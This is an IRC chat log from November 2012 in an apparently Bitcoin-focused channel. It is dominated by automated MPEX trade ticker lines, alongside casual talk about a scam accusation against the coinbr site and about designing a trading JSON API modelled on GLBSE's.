get nested for i am god. Nov 30 04:45:07 commoners are unnested Nov 30 04:45:50 right now i need to whip myself. Nov 30 04:46:34 whip it / whip it good Nov 30 04:49:44 http://trilema.com/2012/visual-culture-test-the-naked-woman/#comment-90762 lol Nov 30 04:49:45 too late Nov 30 04:50:40 lol Nov 30 04:51:23 smickles will prolly be all awwww when he sees this tomorrow Nov 30 04:58:17 [MPEX] [S.MPOE] 2345 @ 0.00053749 = 1.2604 BTC [-] Nov 30 04:58:19 [MPEX] [S.MPOE] 4484 @ 0.0005378 = 2.4115 BTC [+] Nov 30 04:58:20 [MPEX] [S.MPOE] 3653 @ 0.00053783 = 1.9647 BTC [+] Nov 30 04:58:21 [MPEX] [S.MPOE] 15150 @ 0.00053784 = 8.1483 BTC [+] Nov 30 04:58:22 [MPEX] [S.MPOE] 11850 @ 0.00053785 = 6.3735 BTC [+] Nov 30 04:58:24 [MPEX] [S.MPOE] 5458 @ 0.00053794 = 2.9361 BTC [+] Nov 30 05:01:49 [MPEX] [S.MPOE] 2345 @ 0.00052956 = 1.2418 BTC [-] Nov 30 05:01:51 [MPEX] [S.MPOE] 4796 @ 0.00052937 = 2.5389 BTC [-] Nov 30 05:04:45 well, damn, i just had to be taking care of my daughter, rather than refreshing my rss feed of trilema Nov 30 05:06:49 those meddling kids! Nov 30 05:10:40 indeed Nov 30 05:13:16 lol Nov 30 05:13:24 PUNISH HER Nov 30 05:13:53 you know, of all the things i could be after i die, i guess "that voice in the head of psychopaths telling them what to do" wouldn't be the worst... Nov 30 05:21:31 [MPEX] [S.MPOE] 2345 @ 0.00053778 = 1.2611 BTC [+] Nov 30 05:21:32 [MPEX] [S.MPOE] 23855 @ 0.00053794 = 12.8326 BTC [+] Nov 30 05:33:56 [MPEX] [S.MPOE] 2345 @ 0.00053386 = 1.2519 BTC [-] Nov 30 05:33:57 [MPEX] [S.MPOE] 3255 @ 0.00053371 = 1.7372 BTC [-] Nov 30 05:46:33 [MPEX] [S.MPOE] 2345 @ 0.00053736 = 1.2601 BTC [+] Nov 30 05:46:34 [MPEX] [S.MPOE] 9255 @ 0.00053727 = 4.9724 BTC [-] Nov 30 05:50:22 [MPEX] [S.MPOE] 11082 @ 0.00053727 = 5.954 BTC [-] Nov 30 05:50:23 [MPEX] [S.MPOE] 9495 @ 0.00053371 = 5.0676 BTC [-] Nov 30 05:50:25 [MPEX] [S.MPOE] 12373 @ 0.00053028 = 6.5612 BTC [-] Nov 30 05:53:19 http://www.businessweek.com/articles/2012-11-29/dollar-less-iranians-discover-virtual-currency Nov 30 05:54:37 [MPEX] [S.MPOE] 31064 @ 0.00053028 = 16.4726 BTC [-] Nov 30 05:57:07 [MPEX] [S.DICE] 2513 @ 0.00337226 = 8.4745 BTC [+] Nov 30 05:59:33 cool. Nov 30 05:59:53 ahem... right, mircea Nov 30 05:59:57 about the voice thing Nov 30 06:01:07 hm ? Nov 30 06:04:47 ah, nvm, just commenting about your earlier comment Nov 30 06:04:55 o lol Nov 30 06:05:23 i'd try to keep it funny, too Nov 30 06:16:42 [MPEX] [S.MPOE] 11863 @ 0.00053028 = 6.2907 BTC [-] Nov 30 06:16:43 [MPEX] [S.MPOE] 5737 @ 0.00052973 = 3.0391 BTC [-] Nov 30 06:19:57 [MPEX] [S.MPOE] 11063 @ 0.00052973 = 5.8604 BTC [-] Nov 30 06:19:59 [MPEX] [S.MPOE] 116 @ 0.00052937 = 0.0614 BTC [-] Nov 30 06:20:00 [MPEX] [S.MPOE] 3371 @ 0.00052885 = 1.7828 BTC [-] Nov 30 06:25:06 [MPEX] [S.MPOE] 7300 @ 0.00053251 = 3.8873 BTC [+] Nov 30 06:34:51 [MPEX] [S.MPOE] 7050 @ 0.00052885 = 3.7284 BTC [-] Nov 30 06:38:27 [MPEX] [S.MPOE] 9100 @ 0.00053251 = 4.8458 BTC [+] Nov 30 06:40:45 [MPEX] [S.MPOE] 7179 @ 0.00052885 = 3.7966 BTC [-] Nov 30 06:40:46 [MPEX] [S.MPOE] 15971 @ 0.00052671 = 8.4121 BTC [-] Nov 30 06:42:21 [MPEX] [S.BVPS] 5792 @ 0.0022 = 12.7424 BTC [-] Nov 30 06:44:27 [MPEX] [S.MPOE] 7379 @ 0.00052671 = 3.8866 BTC [-] Nov 30 06:44:27 [MPEX] [S.MPOE] 22021 @ 0.00052646 = 11.5932 BTC [-] Nov 30 06:48:17 [MPEX] [S.MPOE] 3921 @ 0.00052646 = 2.0642 BTC [-] Nov 30 06:48:18 [MPEX] [S.MPOE] 10929 @ 0.00052629 = 5.7518 BTC [-] Nov 30 06:51:42 [MPEX] [S.MPOE] 4179 @ 0.00052629 = 2.1994 BTC [-] Nov 30 06:51:43 [MPEX] [S.MPOE] 2321 @ 0.00052599 = 1.2208 BTC [-] Nov 30 06:55:58 [MPEX] [S.MPOE] 25507 @ 0.00052715 = 13.446 BTC [+] Nov 30 06:55:59 [MPEX] [S.MPOE] 6943 @ 0.00052599 = 3.6519 BTC [-] Nov 30 06:58:42 [MPEX] [S.MPOE] 9400 @ 0.00052599 = 4.9443 BTC [-] Nov 30 07:04:38 [MPEX] [S.MPOE] 11900 @ 0.00053251 = 6.3369 BTC [+] Nov 30 07:04:39 [MPEX] [S.MPOE] 10850 @ 0.00053359 = 5.7895 BTC [+] Nov 30 07:04:41 [MPEX] [S.MPOE] 10700 @ 0.00053471 = 5.7214 BTC [+] Nov 30 07:19:47 [MPEX] [S.DICE] 3285 @ 0.00336348 = 11.049 BTC [-] Nov 30 07:19:48 [MPEX] [S.DICE] 5100 @ 0.00328053 = 16.7307 BTC [-] Nov 30 07:19:50 [MPEX] [S.DICE] 1023 @ 0.0032796 = 3.355 BTC [-] Nov 30 07:25:11 [MPEX] [S.MPOE] 27443 @ 0.00052599 = 14.4347 BTC [-] Nov 30 07:27:15 [MPEX] [S.MPOE] 3050 @ 0.00052599 = 1.6043 BTC [-] Nov 30 07:29:01 [MPEX] [S.MPOE] 5850 @ 0.00052927 = 3.0962 BTC [+] Nov 30 07:29:02 [MPEX] [S.MPOE] 1916 @ 0.00053471 = 1.0245 BTC [+] Nov 30 07:36:39 [MPEX] [S.MPOE] 5000 @ 0.0005351 = 2.6755 BTC [+] Nov 30 07:37:26 [MPEX] [S.MPOE] 2345 @ 0.0005379 = 1.2614 BTC [+] Nov 30 07:37:28 [MPEX] [S.MPOE] 4305 @ 0.00053794 = 2.3158 BTC [+] Nov 30 07:43:58 [MPEX] [S.MPOE] 2345 @ 0.00053775 = 1.261 BTC [-] Nov 30 07:43:59 [MPEX] [S.MPOE] 3698 @ 0.00053794 = 1.9893 BTC [+] Nov 30 07:44:57 [MPEX] [S.MPOE] 2909 @ 0.00053794 = 1.5649 BTC [+] Nov 30 07:44:58 [MPEX] [S.MPOE] 22400 @ 0.00053796 = 12.0503 BTC [+] Nov 30 07:45:00 [MPEX] [S.MPOE] 20350 @ 0.00053798 = 10.9479 BTC [+] Nov 30 07:45:01 [MPEX] [S.MPOE] 15741 @ 0.00053802 = 8.469 BTC [+] Nov 30 07:53:49 [MPEX] [S.MPOE] 15859 @ 0.00053802 = 8.5325 BTC [+] Nov 30 07:53:50 [MPEX] [S.MPOE] 29700 @ 0.0005381 = 15.9816 BTC [+] Nov 30 07:53:52 [MPEX] [S.MPOE] 6100 @ 0.0005382 = 3.283 BTC [+] Nov 30 07:53:53 [MPEX] [S.MPOE] 7473 @ 0.00053824 = 4.0223 BTC [+] Nov 30 07:56:47 [MPEX] [S.DICE] 2200 @ 0.0032796 = 7.2151 BTC [-] Nov 30 07:57:38 [MPEX] [S.MPOE] 2345 @ 0.00053525 = 1.2552 BTC [-] Nov 30 07:57:40 [MPEX] [S.MPOE] 4484 @ 0.0005351 = 2.3994 BTC [-] Nov 30 07:59:32 [MPEX] [S.MPOE] 2345 @ 0.00052676 = 1.2353 BTC [-] Nov 30 07:59:34 [MPEX] [S.MPOE] 11429 @ 0.00052651 = 6.0175 BTC [-] **** BEGIN LOGGING AT Fri Nov 30 12:18:36 2012 Nov 30 12:30:17 [MPEX] [S.MPOE] 2345 @ 0.00052615 = 1.2338 BTC [-] Nov 30 12:30:19 [MPEX] [S.MPOE] 18100 @ 0.00052596 = 9.5199 BTC [-] Nov 30 12:30:20 [MPEX] [S.MPOE] 1632 @ 0.00052533 = 0.8573 BTC [-] Nov 30 12:30:21 [MPEX] [S.MPOE] 773 @ 0.00052474 = 0.4056 BTC [-] Nov 30 12:33:59 [MPEX] [S.MPOE] 5427 @ 0.00052474 = 2.8478 BTC [-] Nov 30 12:34:01 [MPEX] [S.MPOE] 12654 @ 0.00052453 = 6.6374 BTC [-] Nov 30 12:42:56 [MPEX] [S.MPOE] 11496 @ 0.00052453 = 6.03 BTC [-] Nov 30 12:45:57 [MPEX] [S.MPOE] 10200 @ 0.00052453 = 5.3502 BTC [-] Nov 30 12:45:58 [MPEX] [S.MPOE] 15800 @ 0.00052451 = 8.2873 BTC [-] Nov 30 12:45:59 [MPEX] [S.MPOE] 3250 @ 0.0005244 = 1.7043 BTC [-] Nov 30 12:48:04 [MPEX] [S.MPOE] 18657 @ 0.0005244 = 9.7837 BTC [-] Nov 30 12:48:06 [MPEX] [S.MPOE] 7015 @ 0.00052421 = 3.6773 BTC [-] Nov 30 12:49:49 [MPEX] [S.MPOE] 2345 @ 0.00052656 = 1.2348 BTC [+] Nov 30 12:49:51 [MPEX] [S.MPOE] 10505 @ 0.00052662 = 5.5321 BTC [+] Nov 30 12:49:52 [MPEX] [S.MPOE] 2950 @ 0.00052901 = 1.5606 BTC [+] Nov 30 12:49:53 [MPEX] [S.MPOE] 2500 @ 0.00053074 = 1.3269 BTC [+] Nov 30 12:52:49 [MPEX] [S.MPOE] 2345 @ 0.00053061 = 1.2443 BTC [-] Nov 30 12:52:50 [MPEX] [S.MPOE] 27950 @ 0.00053074 = 14.8342 BTC [+] Nov 30 12:52:52 [MPEX] [S.MPOE] 22005 @ 0.00053634 = 11.8022 BTC [+] Nov 30 12:58:24 [MPEX] [S.DICE] 958 @ 0.0032648 = 3.1277 BTC [-] Nov 30 13:02:25 [MPEX] [S.MPOE] 19178 @ 0.00053258 = 10.2138 BTC [-] Nov 30 13:20:37 [MPEX] [S.MPOE] 2345 @ 0.00052842 = 1.2391 BTC [-] Nov 30 13:20:39 [MPEX] [S.MPOE] 2345 @ 0.00052842 = 1.2391 BTC [-] Nov 30 13:20:40 [MPEX] [S.MPOE] 3910 @ 0.00052823 = 2.0654 BTC [-] Nov 30 13:28:55 [MPEX] [S.MPOE] 3850 @ 0.00052823 = 2.0337 BTC [-] Nov 30 13:33:52 [MPEX] [S.MPOE] 2345 @ 0.00053081 = 1.2447 BTC [+] Nov 30 13:33:54 [MPEX] [S.MPOE] 2345 @ 0.00053093 = 1.245 BTC [+] Nov 30 13:33:55 [MPEX] [S.MPOE] 8410 @ 0.00053116 = 4.4671 BTC [+] Nov 30 13:40:23 [MPEX] [S.MPOE] 2345 @ 0.00052858 = 1.2395 BTC [-] Nov 30 13:40:25 [MPEX] [S.MPOE] 2345 @ 0.00052826 = 1.2388 BTC [-] Nov 30 13:40:26 [MPEX] [S.MPOE] 13940 @ 0.00052823 = 7.3635 BTC [-] Nov 30 13:40:27 [MPEX] [S.MPOE] 10500 @ 0.00052729 = 5.5365 BTC [-] Nov 30 13:40:28 [MPEX] [S.MPOE] 3179 @ 0.00052421 = 1.6665 BTC [-] Nov 30 13:44:19 [MPEX] [S.MPOE] 2345 @ 0.00053111 = 1.2455 BTC [+] Nov 30 13:44:20 [MPEX] [S.MPOE] 2345 @ 0.00053111 = 1.2455 BTC [+] Nov 30 13:44:22 [MPEX] [S.MPOE] 15581 @ 0.00053116 = 8.276 BTC [+] Nov 30 13:45:57 [MPEX] [S.MPOE] 2345 @ 0.00053109 = 1.2454 BTC [-] Nov 30 13:45:58 [MPEX] [S.MPOE] 859 @ 0.00053116 = 0.4563 BTC [+] Nov 30 13:45:59 [MPEX] [S.MPOE] 8446 @ 0.00053258 = 4.4982 BTC [+] Nov 30 13:49:30 [MPEX] [S.MPOE] 18676 @ 0.00053258 = 9.9465 BTC [+] Nov 30 13:49:31 [MPEX] [S.MPOE] 8576 @ 0.00053406 = 4.5801 BTC [+] Nov 30 14:17:50 [MPEX] [S.DICE] 1500 @ 0.00333051 = 4.9958 BTC [+] Nov 30 14:22:05 [MPEX] [S.MPOE] 2345 @ 0.00052448 = 1.2299 BTC [-] Nov 30 14:22:07 [MPEX] [S.MPOE] 9989 @ 0.00052421 = 5.2363 BTC [-] Nov 30 14:29:52 [MPEX] [S.MPOE] 2345 @ 0.00052911 = 1.2408 BTC [+] Nov 30 14:29:54 [MPEX] [S.MPOE] 12455 @ 0.00052876 = 6.5857 BTC [-] Nov 30 14:36:37 [MPEX] [S.MPOE] 2345 @ 0.00052943 = 1.2415 BTC [+] Nov 30 14:36:39 [MPEX] [S.MPOE] 5755 @ 0.00052949 = 3.0472 BTC [+] Nov 30 14:42:17 [MPEX] [S.MPOE] 2345 @ 0.00052878 = 1.24 BTC [-] Nov 30 14:42:19 [MPEX] [S.MPOE] 4755 @ 0.00052876 = 2.5143 BTC [-] Nov 30 14:46:30 [MPEX] [S.MPOE] 27598 @ 0.00052876 = 14.5927 BTC [-] Nov 30 14:56:17 [MPEX] [S.MPOE] 3602 @ 0.00052771 = 1.9008 BTC [-] Nov 30 14:56:18 [MPEX] [S.MPOE] 2345 @ 0.00052914 = 1.2408 BTC [+] Nov 30 14:56:20 [MPEX] [S.MPOE] 24503 @ 0.00052918 = 12.9665 BTC [+] Nov 30 14:58:55 [MPEX] [S.MPOE] 2345 @ 0.00052898 = 1.2405 BTC [-] Nov 30 14:58:57 [MPEX] [S.MPOE] 10147 @ 0.00052918 = 5.3696 BTC [+] Nov 30 14:58:58 [MPEX] [S.MPOE] 3608 @ 0.00052949 = 1.9104 BTC [+] Nov 30 15:00:40 [MPEX] [S.MPOE] 1609 @ 0.00052435 = 0.8437 BTC [-] Nov 30 15:05:46 [MPEX] [S.MPOE] 14917 @ 0.00052421 = 7.8196 BTC [-] Nov 30 15:05:54 [MPEX] [S.MPOE] 18134 @ 0.00052419 = 9.5057 BTC [-] Nov 30 15:05:54 [MPEX] [S.MPOE] 19818 @ 0.00052392 = 10.383 BTC [-] Nov 30 15:05:54 [MPEX] [S.MPOE] 11171 @ 0.00052372 = 5.8505 BTC [-] Nov 30 15:05:54 [MPEX] [S.MPOE] 9260 @ 0.00052361 = 4.8486 BTC [-] Nov 30 15:06:01 morning Nov 30 15:06:17 so, apparently i need to slap "The use of this site is for educational and entertainment purposes only." on coinbr Nov 30 15:06:33 to evade accusations that i'm "borderline scammer", eh? Nov 30 15:07:58 while the same person says that that to say about myself that i'm a broker, i need some certificate, lol Nov 30 15:09:21 oh, and i also need insurance. usagi, you there? Nov 30 15:11:14 [MPEX] [S.MPOE] 2345 @ 0.00052379 = 1.2283 BTC [+] Nov 30 15:11:15 [MPEX] [S.MPOE] 2345 @ 0.00052362 = 1.2279 BTC [-] Nov 30 15:11:17 [MPEX] [S.MPOE] 8740 @ 0.00052361 = 4.5764 BTC [-] Nov 30 15:11:18 [MPEX] [S.MPOE] 15192 @ 0.00052354 = 7.9536 BTC [-] Nov 30 15:11:26 https://bitcointalk.org/index.php?topic=102181.msg1367797#msg1367797 Nov 30 15:13:10 so, mircea_popescu, of it all comes that we should get some legal affidavit that that nothing we trade is real. Nov 30 15:13:20 then we can call ourselves "security exchange" and "broker" Nov 30 15:14:50 people used to put that on video game ROM download sites Nov 30 15:15:01 "This site is for educational purposes only" Nov 30 15:15:19 yeah i'm sure those words are magic Nov 30 15:15:29 poof, you're safe :) Nov 30 15:16:34 wow borderline scammer accusation from the operator of a borderline exchange in a borderline currency Nov 30 15:16:51 yeah borderline trolling Nov 30 15:18:06 and we need borderline insurance, don't forget :P Nov 30 15:18:21 [MPEX] [S.MPOE] 13607 @ 0.00052354 = 7.1238 BTC [-] Nov 30 15:18:23 [MPEX] [S.MPOE] 14043 @ 0.00052337 = 7.3497 BTC [-] Nov 30 15:20:01 [MPEX] [S.MPOE] 2345 @ 0.00052435 = 1.2296 BTC [+] Nov 30 15:20:02 [MPEX] [S.MPOE] 1755 @ 0.00052448 = 0.9205 BTC [+] Nov 30 15:20:27 mmm Nov 30 15:20:38 just use CPA oh wiat Nov 30 15:21:08 lol mpex has self-issued court immunity Nov 30 15:21:18 if that's not good enough i dunno what is. Nov 30 15:21:20 and I'm going to my tax directorate branch tomorrow, to get official acknowledgement that i'm doing imaginary trades Nov 30 15:21:25 only Nov 30 15:22:23 oh, can we have this immunity extended to coinbr? Nov 30 15:22:32 no. Nov 30 15:22:47 it's only for white background websites Nov 30 15:23:17 [MPEX] [S.MPOE] 2100 @ 0.00052339 = 1.0991 BTC [-] Nov 30 15:23:57 but anyway Nov 30 15:25:09 the argument is pretty retarded, "your honor, I thought jurov was a broker" "well... did you wire him money ?" Nov 30 15:25:13 "no, he wouldn't take money" Nov 30 15:25:18 "this makes sense" Nov 30 15:30:11 oh and what if hacker sells all coinbr holdings? https://bitcointalk.org/index.php?topic=118551.msg1367844#msg1367844 Nov 30 15:31:14 o any mistakes you make are far harder to fix than if you were running your own exchange where you probably would eat a BTC loss out of the wallet but could easily revert to a previous backup. Nov 30 15:31:24 i cant even... Nov 30 15:32:50 so if i empty btct wallet, they'll just revert to previous backup, and all will be dandy Nov 30 15:33:01 why didn't i think of such? Nov 30 15:33:03 this is a bizzare argument Nov 30 15:33:10 seems to me the broker-exchange structure is inherently safer Nov 30 15:33:24 than just the straight exchange. amply displayed in the case of icbit Nov 30 15:33:40 they weren't expecting a user to go through a broker, and thus have actual proof of their bs shady dealings Nov 30 15:34:02 i think in general there's this expectation on the part of website owners that they have license to alter history Nov 30 15:34:07 as displayed for instance by dwolla. Nov 30 15:36:28 it's a business model for some, like betsofbitcoin Nov 30 15:37:50 okay. gotta go sweat it off to the gym Nov 30 15:37:52 later Nov 30 15:41:13 [MPEX] [S.MPOE] 245 @ 0.00052339 = 0.1282 BTC [-] Nov 30 15:41:14 [MPEX] [S.MPOE] 2999 @ 0.00052337 = 1.5696 BTC [-] Nov 30 15:41:16 [MPEX] [S.MPOE] 13250 @ 0.00052327 = 6.9333 BTC [-] Nov 30 15:41:17 [MPEX] [S.MPOE] 2496 @ 0.00052306 = 1.3056 BTC [-] Nov 30 15:45:24 [MPEX] [S.MPOE] 7900 @ 0.00052306 = 4.1322 BTC [-] Nov 30 15:56:58 [MPEX] [S.MPOE] 5000 @ 0.00052306 = 2.6153 BTC [-] Nov 30 16:05:35 [MPEX] [S.MPOE] 2047 @ 0.00052306 = 1.0707 BTC [-] Nov 30 16:05:37 [MPEX] [S.MPOE] 17553 @ 0.00052303 = 9.1807 BTC [-] Nov 30 16:12:13 [MPEX] [S.MPOE] 2345 @ 0.0005242 = 1.2292 BTC [+] Nov 30 16:12:15 [MPEX] [S.MPOE] 13695 @ 0.00052448 = 7.1828 BTC [+] Nov 30 16:12:16 [MPEX] [S.MPOE] 16360 @ 0.00052749 = 8.6297 BTC [+] Nov 30 16:18:44 [MPEX] [S.DICE] 950 @ 0.00333969 = 3.1727 BTC [+] Nov 30 16:22:27 [MPEX] [S.MPOE] 2345 @ 0.00052722 = 1.2363 BTC [-] Nov 30 16:22:29 [MPEX] [S.MPOE] 1455 @ 0.00052749 = 0.7675 BTC [+] Nov 30 16:32:55 [MPEX] [S.MPOE] 2345 @ 0.00052646 = 1.2345 BTC [-] Nov 30 16:32:56 [MPEX] [S.MPOE] 2345 @ 0.00052642 = 1.2345 BTC [-] Nov 30 16:32:58 [MPEX] [S.MPOE] 3879 @ 0.00052628 = 2.0414 BTC [-] Nov 30 16:34:24 [MPEX] [S.MPOE] 5893 @ 0.00052628 = 3.1014 BTC [-] Nov 30 16:34:26 [MPEX] [S.MPOE] 6757 @ 0.00052303 = 3.5341 BTC [-] Nov 30 16:37:57 [MPEX] [S.MPOE] 239 @ 0.00052303 = 0.125 BTC [-] Nov 30 16:37:59 [MPEX] [S.MPOE] 7900 @ 0.00052286 = 4.1306 BTC [-] Nov 30 16:43:58 http://www.neochat.co.uk - New chat community, make it your new home!!! Nov 30 16:46:55 lmao Nov 30 16:52:06 [MPEX] [S.MPOE] 17000 @ 0.00052286 = 8.8886 BTC [-] Nov 30 16:52:08 [MPEX] [S.MPOE] 11368 @ 0.00052265 = 5.9415 BTC [-] Nov 30 17:00:22 [MPEX] [S.MPOE] 7450 @ 0.00052265 = 3.8937 BTC [-] Nov 30 17:04:19 [MPEX] [S.MPOE] 11460 @ 0.00052265 = 5.9896 BTC [-] Nov 30 17:04:21 [MPEX] [S.MPOE] 17849 @ 0.00052265 = 9.3288 BTC [-] Nov 30 17:07:40 [MPEX] [S.MPOE] 2345 @ 0.0005268 = 1.2353 BTC [+] Nov 30 17:07:42 [MPEX] [S.MPOE] 2 @ 0.00052686 = 0.0011 BTC [+] Nov 30 17:10:03 [MPEX] [S.MPOE] 2345 @ 0.00052679 = 1.2353 BTC [-] Nov 30 17:10:05 [MPEX] [S.MPOE] 9555 @ 0.00052686 = 5.0341 BTC [+] Nov 30 17:13:26 [MPEX] [S.MPOE] 1918 @ 0.00052541 = 1.0077 BTC [-] Nov 30 17:13:28 [MPEX] [S.MPOE] 14040 @ 0.00052686 = 7.3971 BTC [+] Nov 30 17:19:56 [MPEX] [S.DICE] 3350 @ 0.00334387 = 11.202 BTC [+] Nov 30 17:25:01 [MPEX] [S.MPOE] 2345 @ 0.00052293 = 1.2263 BTC [-] Nov 30 17:25:02 [MPEX] [S.MPOE] 18751 @ 0.00052265 = 9.8002 BTC [-] Nov 30 17:25:03 [MPEX] [S.MPOE] 4804 @ 0.00052262 = 2.5107 BTC [-] Nov 30 17:30:37 [MPEX] [S.MPOE] 2345 @ 0.00052277 = 1.2259 BTC [+] Nov 30 17:30:38 [MPEX] [S.MPOE] 6773 @ 0.00052262 = 3.5397 BTC [-] Nov 30 17:37:00 http://soundcloud.com/djleo/bitcoin-bomb Nov 30 17:40:05 [MPEX] [S.MPOE] 2345 @ 0.00052303 = 1.2265 BTC [+] Nov 30 17:40:06 [MPEX] [S.MPOE] 41700 @ 0.00052312 = 21.8141 BTC [+] Nov 30 17:40:07 [MPEX] [S.MPOE] 903 @ 0.00052686 = 0.4758 BTC [+] Nov 30 17:40:08 [MPEX] [S.MPOE] 7852 @ 0.00052749 = 4.1419 BTC [+] Nov 30 18:00:05 [MPEX] [S.MPOE] 1000 @ 0.00052421 = 0.5242 BTC [-] Nov 30 18:00:06 [MPEX] [S.MPOE] 2345 @ 0.00052422 = 1.2293 BTC [+] Nov 30 18:00:08 [MPEX] [S.MPOE] 9655 @ 0.0005243 = 5.0621 BTC [+] Nov 30 18:04:37 [MPEX] [S.MPOE] 2345 @ 0.00052276 = 1.2259 BTC [-] Nov 30 18:04:38 [MPEX] [S.MPOE] 15455 @ 0.00052262 = 8.0771 BTC [-] Nov 30 18:08:49 [MPEX] [S.MPOE] 2345 @ 0.00052413 = 1.2291 BTC [+] Nov 30 18:08:50 [MPEX] [S.MPOE] 6755 @ 0.0005243 = 3.5416 BTC [+] Nov 30 18:14:16 man Nov 30 18:14:19 I am stuck :/ Nov 30 18:14:26 have sto setup the json api.. Nov 30 18:14:33 and trying to think of a really clever way to do it Nov 30 18:15:08 rather than just sent api_key, api_pin, cmd, array(key=value) Nov 30 18:15:22 mebbe its just the best way Nov 30 18:15:37 dont expose yourself in here Nov 30 18:16:24 lol i expose controller, not myself. i'm only pulling strings. Nov 30 18:16:48 I honestly wish I could see GLBSE's api command list again. cant find it on google anywhere. not because i wanna just copy it, but because I want ppl to be able to use old glbse trading scripts by just changing the url Nov 30 18:16:59 yeah, thats what they all say :P Nov 30 18:18:23 maybe try making it similar to mtgox Nov 30 18:18:31 no Nov 30 18:18:41 I stay away from that rats nest of api crazyness Nov 30 18:18:46 thats what ppl hte Nov 30 18:18:47 hate Nov 30 18:18:50 its all over the place Nov 30 18:18:58 i was annoyed at having to figure it out just to use it Nov 30 18:25:42 [MPEX] [S.MPOE] 2345 @ 0.00052273 = 1.2258 BTC [-] Nov 30 18:25:43 [MPEX] [S.MPOE] 152 @ 0.00052262 = 0.0794 BTC [-] Nov 30 18:25:45 [MPEX] [S.MPOE] 14872 @ 0.00052246 = 7.77 BTC [-] Nov 30 18:25:45 [MPEX] [S.MPOE] 10431 @ 0.00052244 = 5.4496 BTC [-] Nov 30 18:30:03 [MPEX] [S.MPOE] 2345 @ 0.00052408 = 1.229 BTC [+] Nov 30 18:30:04 [MPEX] [S.MPOE] 490 @ 0.0005243 = 0.2569 BTC [+] Nov 30 18:30:06 [MPEX] [S.MPOE] 8315 @ 0.0005268 = 4.3803 BTC [+] Nov 30 18:31:59 [MPEX] [S.MPOE] 24655 @ 0.0005268 = 12.9883 BTC [+] Nov 30 18:32:00 [MPEX] [S.MPOE] 3780 @ 0.00052749 = 1.9939 BTC [+] Nov 30 18:32:02 [MPEX] [S.MPOE] 3065 @ 0.00052789 = 1.618 BTC [+] Nov 30 18:38:53 [MPEX] [S.MPOE] 2345 @ 0.00052246 = 1.2252 BTC [-] Nov 30 18:38:55 [MPEX] [S.MPOE] 8119 @ 0.00052244 = 4.2417 BTC [-] Nov 30 18:38:56 [MPEX] [S.MPOE] 9717 @ 0.00052241 = 5.0763 BTC [-] Nov 30 18:49:16 [MPEX] [S.MPOE] 2345 @ 0.00052774 = 1.2376 BTC [+] Nov 30 18:49:18 [MPEX] [S.MPOE] 6135 @ 0.00052789 = 3.2386 BTC [+] Nov 30 18:49:19 [MPEX] [S.MPOE] 1920 @ 0.00052847 = 1.0147 BTC [+] Nov 30 18:52:05 [MPEX] [S.MPOE] 2345 @ 0.00052253 = 1.2253 BTC [-] Nov 30 18:52:06 [MPEX] [S.MPOE] 4756 @ 0.00052241 = 2.4846 BTC [-] Nov 30 18:55:30 [MPEX] [S.MPOE] 2345 @ 0.00052245 = 1.2251 BTC [+] Nov 30 18:55:31 [MPEX] [S.MPOE] 15361 @ 0.00052241 = 8.0247 BTC [-] Nov 30 18:55:33 [MPEX] [S.MPOE] 1500 @ 0.00052232 = 0.7835 BTC [-] Nov 30 18:55:33 [MPEX] [S.MPOE] 13530 @ 0.00052205 = 7.0633 BTC [-] Nov 30 18:58:54 [MPEX] [S.MPOE] 3450 @ 0.00052205 = 1.8011 BTC [-] Nov 30 19:01:23 [MPEX] [S.MPOE] 1961 @ 0.00052205 = 1.0237 BTC [-] Nov 30 19:01:25 [MPEX] [S.MPOE] 1763 @ 0.00052192 = 0.9201 BTC [-] Nov 30 19:04:58 [MPEX] [S.MPOE] 14737 @ 0.00052192 = 7.6915 BTC [-] Nov 30 19:05:00 [MPEX] [S.MPOE] 4224 @ 0.0005218 = 2.2041 BTC [-] Nov 30 19:07:19 fucking glbse api system. now that I see it, there is no way I will use 50,00 fake subdirs for api calls Nov 30 19:07:21 just retarded Nov 30 19:08:23 Ukto i was gonna say glbse system was retarded Nov 30 19:08:39 i chose to stfu, on the theory that unless you're an idiot you'll figure it out yourself in short order. Nov 30 19:08:47 im just gonna go with my original idea. Nov 30 19:09:08 api_key, api_pin, cmd, array(key=value) Nov 30 19:09:22 50,00 fake subdirs? Nov 30 19:09:57 yeh. api/account/assset/list api/account/balance api/market/buy market/order/cancel asset/depth market/orders history/bitcoin history/assets Nov 30 19:09:58 etc etc etc Nov 30 19:10:12 instead of just sending a fucking command key Nov 30 19:10:25 hi, lets bloat mod_rewrite instead! Nov 30 19:10:26 hm, perhaps it was hanled by a router? Nov 30 19:10:31 no Nov 30 19:10:35 [MPEX] [S.MPOE] 2345 @ 0.00052836 = 1.239 BTC [+] Nov 30 19:10:36 he wasnt that advanced Nov 30 19:10:36 [MPEX] [S.MPOE] 21528 @ 0.00052847 = 11.3769 BTC [+] Nov 30 19:10:37 [MPEX] [S.MPOE] 7182 @ 0.00052949 = 3.8028 BTC [+] Nov 30 19:10:38 [MPEX] [S.MPOE] 145 @ 0.00053076 = 0.077 BTC [+] Nov 30 19:10:42 he could barely get ruby to work Nov 30 19:10:48 wasnt even use rails Nov 30 19:10:55 using some other wtf off shoot Nov 30 19:11:03 dunno Nov 30 19:11:10 even if you do it with mod Nov 30 19:11:18 rewrite, it's not particularly sane Nov 30 19:11:22 you dont need mod Nov 30 19:11:26 your just writing the cmd if you do it with mod Nov 30 19:11:27 no reaosn to Nov 30 19:11:32 just let the client send the cmd directly Nov 30 19:11:34 and eb done with it Nov 30 19:11:50 url should just be /api/ Nov 30 19:11:56 and send your fucking json api call Nov 30 19:12:39 he made api calls to create assets. Nov 30 19:12:40 wtf Nov 30 19:12:53 just screams BAD IDEA Nov 30 19:13:01 yes you need about 10k calls of that a day Nov 30 19:13:31 account/asset/new Nov 30 19:13:39 and account/asset/issue Nov 30 19:13:41 where are you reading this anyway Nov 30 19:13:48 https://gitorious.org/black-market/black-market-client/blobs/3a2403d300329d9b2571a7d47a9edf68fb60418b/bmc.py Nov 30 19:13:56 code from someones python script Nov 30 19:13:59 they made for it Nov 30 19:14:08 most complete api cmd reference I could find Nov 30 19:14:29 although Nov 30 19:14:39 there are some he's missing, but thats because nefario never told anyone but me. heh Nov 30 19:15:10 you get internet points +1 Nov 30 19:15:19 no no Nov 30 19:15:26 thats a -, I assure you Nov 30 19:15:28 because he didnt post them Nov 30 19:16:25 you guys think api key + api pin is secure enough? Nov 30 19:16:34 was debating letting users also do 2fa Nov 30 19:16:40 [MPEX] [S.MPOE] 2345 @ 0.00053047 = 1.244 BTC [-] Nov 30 19:16:41 [MPEX] [S.MPOE] 17955 @ 0.00053076 = 9.5298 BTC [+] Nov 30 19:18:14 for starters Nov 30 19:18:14 